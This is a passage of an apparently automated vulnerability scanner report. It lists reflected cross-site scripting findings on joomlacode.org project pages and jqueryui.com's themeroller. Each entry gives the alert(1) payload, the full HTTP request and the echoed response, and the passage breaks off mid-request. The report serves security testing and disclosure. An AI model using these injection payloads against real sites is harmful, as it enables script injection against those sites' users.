4.127. http://joomlacode.org/gf/project/joomla/frs/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/frs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93e96"style%3d"x%3aexpression(alert(1))"652b2f9725e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 93e96"style="x:expression(alert(1))"652b2f9725e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/joomla/frs/?93e96"style%3d"x%3aexpression(alert(1))"652b2f9725e=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/joomla/frs/?action=&93e96"style="x:expression(alert(1))"652b2f9725e=1&br_pkgrls_limit=5">
...[SNIP]...

4.128. http://joomlacode.org/gf/project/joomla/mailman/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/mailman/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3169"style%3d"x%3aexpression(alert(1))"fe217adffb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c3169"style="x:expression(alert(1))"fe217adffb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/joomla/mailman/?c3169"style%3d"x%3aexpression(alert(1))"fe217adffb1=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:29:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/joomla/mailman/?action=&c3169"style="x:expression(alert(1))"fe217adffb1=1&__gads=ID%3D9359d8f79e15ae5a%3AT%3D1295919318%3AS%3DALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg&__utmz=13354156.1295919321.1.1.utmcsr%3Dburp%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%
...[SNIP]...

4.129. http://joomlacode.org/gf/project/joomla/mailman/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/mailman/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cfcbc'style%3d'x%3aexpression(alert(1))'1670775646d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cfcbc'style='x:expression(alert(1))'1670775646d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/joomla/mailman/?cfcbc'style%3d'x%3aexpression(alert(1))'1670775646d=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:29:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
AME_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["br_mailmansmailman_LIST_NAME_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/joomla/mailman/?action=&cfcbc'style='x:expression(alert(1))'1670775646d=1&br_mailmanssort_by=mailman.LIST_NAME&br_mailmanssort_order=asc' />
...[SNIP]...

4.130. http://joomlacode.org/gf/project/joomla/reporting/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/reporting/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9725d"style%3d"x%3aexpression(alert(1))"ce70f89e3c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9725d"style="x:expression(alert(1))"ce70f89e3c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/joomla/reporting/?9725d"style%3d"x%3aexpression(alert(1))"ce70f89e3c3=1 HTTP/1.1
Host: joomlacode.org
Proxy-Connection: keep-alive
Referer: http://joomlacode.org/gf/project/joomla/tracker/?3ee00%22style%3d%22x%3aexpression(alert(1))%22744e3c5545f=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.1.10.1295919318

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:02:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
<form action="/gf/project/joomla/reporting/?action=&9725d"style="x:expression(alert(1))"ce70f89e3c3=1" method="post">
...[SNIP]...

4.131. http://joomlacode.org/gf/project/joomla/tracker/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/tracker/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee00"style%3d"x%3aexpression(alert(1))"744e3c5545f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ee00"style="x:expression(alert(1))"744e3c5545f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/joomla/tracker/?3ee00"style%3d"x%3aexpression(alert(1))"744e3c5545f=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/joomla/tracker/?action=&3ee00"style="x:expression(alert(1))"744e3c5545f=1&br_trackers_limit=5">
...[SNIP]...

4.132. http://joomlacode.org/gf/project/joomla/tracker/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/tracker/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f7a03'style%3d'x%3aexpression(alert(1))'9f2195e1359 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7a03'style='x:expression(alert(1))'9f2195e1359 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/joomla/tracker/?f7a03'style%3d'x%3aexpression(alert(1))'9f2195e1359=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
TYPE_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["br_trackerstracker_DATATYPE_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/joomla/tracker/?action=&f7a03'style='x:expression(alert(1))'9f2195e1359=1&br_trackerssort_by=tracker.DATATYPE&br_trackerssort_order=asc' />
...[SNIP]...

4.133. http://joomlacode.org/gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7669b'style%3d'x%3aexpression(alert(1))'46fd3415584 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7669b'style='x:expression(alert(1))'46fd3415584 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1?7669b'style%3d'x%3aexpression(alert(1))'46fd3415584=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:20:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
TYPE_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["br_trackerstracker_DATATYPE_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/joomla/tracker/?action=&7669b'style='x:expression(alert(1))'46fd3415584=1&br_trackerssort_by=tracker.DATATYPE&br_trackerssort_order=asc' />
...[SNIP]...

4.134. http://joomlacode.org/gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5763"style%3d"x%3aexpression(alert(1))"34a90f5b234 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5763"style="x:expression(alert(1))"34a90f5b234 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1?b5763"style%3d"x%3aexpression(alert(1))"34a90f5b234=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:20:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/joomla/tracker/?action=&b5763"style="x:expression(alert(1))"34a90f5b234=1&__gads=ID%3D9359d8f79e15ae5a%3AT%3D1295919318%3AS%3DALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg&__utmz=13354156.1295919321.1.1.utmcsr%3Dburp%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%
...[SNIP]...

4.135. http://joomlacode.org/gf/project/mambot_google1/news/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/mambot_google1/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf24d"style%3d"x%3aexpression(alert(1))"65979b9fed4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cf24d"style="x:expression(alert(1))"65979b9fed4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/mambot_google1/news/?cf24d"style%3d"x%3aexpression(alert(1))"65979b9fed4=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:47:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/mambot_google1/news/?action=&cf24d"style="x:expression(alert(1))"65979b9fed4=1&__gads=ID%3D9359d8f79e15ae5a%3AT%3D1295919318%3AS%3DALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg&__utmz=13354156.1295919321.1.1.utmcsr%3Dburp%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%
...[SNIP]...

4.136. http://joomlacode.org/gf/project/mambot_google1/news/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/mambot_google1/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dd0d2'style%3d'x%3aexpression(alert(1))'c75ef3eb876 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd0d2'style='x:expression(alert(1))'c75ef3eb876 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/mambot_google1/news/?dd0d2'style%3d'x%3aexpression(alert(1))'c75ef3eb876=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:47:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
OST_DATE_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["newsnews_POST_DATE_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/mambot_google1/news/?action=&dd0d2'style='x:expression(alert(1))'c75ef3eb876=1&newssort_by=news.POST_DATE&newssort_order=asc' />
...[SNIP]...

4.137. http://joomlacode.org/gf/project/opengallery/news/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/opengallery/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 40eae'style%3d'x%3aexpression(alert(1))'0f0be08920d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 40eae'style='x:expression(alert(1))'0f0be08920d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/opengallery/news/?40eae'style%3d'x%3aexpression(alert(1))'0f0be08920d=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:42:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
s_POST_DATE_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["newsnews_POST_DATE_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/opengallery/news/?action=&40eae'style='x:expression(alert(1))'0f0be08920d=1&newssort_by=news.POST_DATE&newssort_order=asc' />
...[SNIP]...

4.138. http://joomlacode.org/gf/project/opengallery/news/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/opengallery/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41731"style%3d"x%3aexpression(alert(1))"7f37426bd6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41731"style="x:expression(alert(1))"7f37426bd6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/opengallery/news/?41731"style%3d"x%3aexpression(alert(1))"7f37426bd6a=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:42:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/opengallery/news/?action=&41731"style="x:expression(alert(1))"7f37426bd6a=1&__gads=ID%3D9359d8f79e15ae5a%3AT%3D1295919318%3AS%3DALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg&__utmz=13354156.1295919321.1.1.utmcsr%3Dburp%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%
...[SNIP]...

4.139. http://joomlacode.org/gf/snippet/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/snippet/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ed9f"style%3d"x%3aexpression(alert(1))"8d782a550bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ed9f"style="x:expression(alert(1))"8d782a550bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/snippet/?2ed9f"style%3d"x%3aexpression(alert(1))"8d782a550bf=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:16:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
<a href="/gf/snippet/?action=&2ed9f"style="x:expression(alert(1))"8d782a550bf=1&_trove_category_id=13">
...[SNIP]...

4.140. http://jqueryui.com/themeroller/ [bgColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae11"><script>alert(1)</script>ebc3646c0ab was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9eae11"><script>alert(1)</script>ebc3646c0ab&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a